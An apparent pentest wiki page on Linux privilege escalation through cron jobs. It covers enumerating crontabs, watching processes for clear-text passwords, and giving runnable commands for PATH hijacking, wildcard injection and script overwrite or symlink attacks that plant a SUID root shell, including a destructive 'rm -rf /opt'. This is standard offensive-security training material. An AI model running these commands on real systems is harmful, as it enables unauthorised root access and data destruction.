Cron Jobs
Theory
Cron is a job scheduler in Unix-based operating systems. Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. By default, Cron runs as root when executing /etc/crontab, so any commands or scripts that are called by the crontab will also run as root. It can be an intresting privelege escalation path.
Practice
Misc Cron Jobs
You may want to enumerate cron jobs with the following commands
#Print jobs with Crontab binary
crontab -l
crontab -l -u username
#Directly cat files
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
#From logs
cat /var/log/syslog | grep "CRON"
#In /etc/ and subfolders
cat /etc/crontab
cat /etc/cron*/*
# In /var/spool
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*By using pspy, you can fetch processes without root privileges. It can be useful to detect cron jobs.
# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000It is also possible to monitor processes using the watch command. For example, we can grep on all occurrences of the word "pass". We may find clear-text credentials like that.
watch -n 1 "ps -ef | grep pass"Cron Path
For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
We need to check if we have permissions to write on each path, if a the binary in the cron job is specified without the full command path, we may be able to exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root path-exploit.shWe need to check if we have permission to write each path.
ls -al /usr/local/
ls -al /usr/
ls -al /Assume we can write an arbitrary binary file under /home/user, and its specified in the crontab PATH as in the example. We can create a payload in there.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/path-exploit.sh
chmod +x /home/user/path-exploit.shThen wait for the job to execute.
# Run SUID Shell after exploit
/tmp/bash -pWildcard Injection
If a cron job script running as root contains an * inside a command, then you may be able to exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root rsync -a *.sh rsync://host.back/src/rbdThe exploit will depend of the binary. Using the previous example, we can use following commands to exploit it.
touch "-e sh myscript.sh"
echo '<PAYLOAD>' > myscript.shRead the following page for more wildcard exploitation tricks: HERE
File Overwriting and Symlink
If you can modify a cron job script executed by root, or it use a directory where you have full access, the we can exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root /opt/crons/overwrite.shIf we have write permissions on the script, we can exploit by overwriting it:
#Check you have permissions
ls -la /opt/crons/overwrite.sh
#Overwrite
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /opt/crons/overwrite.sh
#Wait until it is executed
/tmp/bash -pIf we have full access over the directory, maybe it could be useful to delete that folder and create a symlink folder to another one serving a script controlled by you
#Check you have permissions
ls -la /
#Remove folder and create the symlink target
rm -rf /opt
mkdir /tmp/crons
#Create a new script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/crons/overwrite.sh
#Create symlinl folder
ln -d -s /tmp/crons/ /opt/crons/References
Last updated
Was this helpful?